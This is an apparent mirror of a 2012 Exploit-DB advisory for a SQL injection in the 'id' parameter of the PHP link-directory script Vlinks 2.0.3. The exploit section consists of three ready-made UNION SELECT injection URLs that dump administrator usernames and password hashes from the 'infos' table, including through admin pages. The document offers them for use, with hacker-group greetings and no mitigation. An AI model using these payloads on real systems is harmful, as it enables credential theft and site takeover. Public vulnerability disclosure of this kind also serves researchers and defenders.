Vlinks 2.0.3 – ‘id’ SQL Injection - 体验盒子

作者： JIKO

日期： 2012-08-27

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/20859/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

#########################################################################################

[!x!] Informations:

Name : vlinks

Download : http://www.vlinks.org/ =>http://www.vlinks.org/telechargements/Vlinks2.0.3.zip (And All Version)

Vulnerability: Sql Injection

Author : JIKO(JAWAD)

Contact: jalikom@hotmail.com

Site : No-ExploiT.CoM (Is Back)

Notes: No-ExploiT.CoM Miss

#########################################################################################

[!x!] Bug:

Bugged file is /[path]/page.php?

[Note]

Pass Simple

[/Note]

#########################################################################################

[!x!] Exploit:

Exploit: http://no-exploit.com/forum/site.php?ps=1&idc=1&id=-991 union select 0,concat(pseudo,0x3a,passe),2,3,4,5,6,7,8,9,10,11 from infos--

[Admin Panel] ! Need Login

Exploit: http://no-exploit.com/forum/admin/admin_modif_categorie.php?id=-1 union select 0,concat(pseudo,0x3a,passe),2 from infos--

Exploit: http://no-exploit.com/forum/admin/admin_modif_partenaire.php?id=-1 union select 0,concat(pseudo,0x3a,passe),2,3,4,5,6 from infos--

########################################################################################

[!x!] To: All friends

Cyber_Devil Allah with you

members [No-exploit.Com]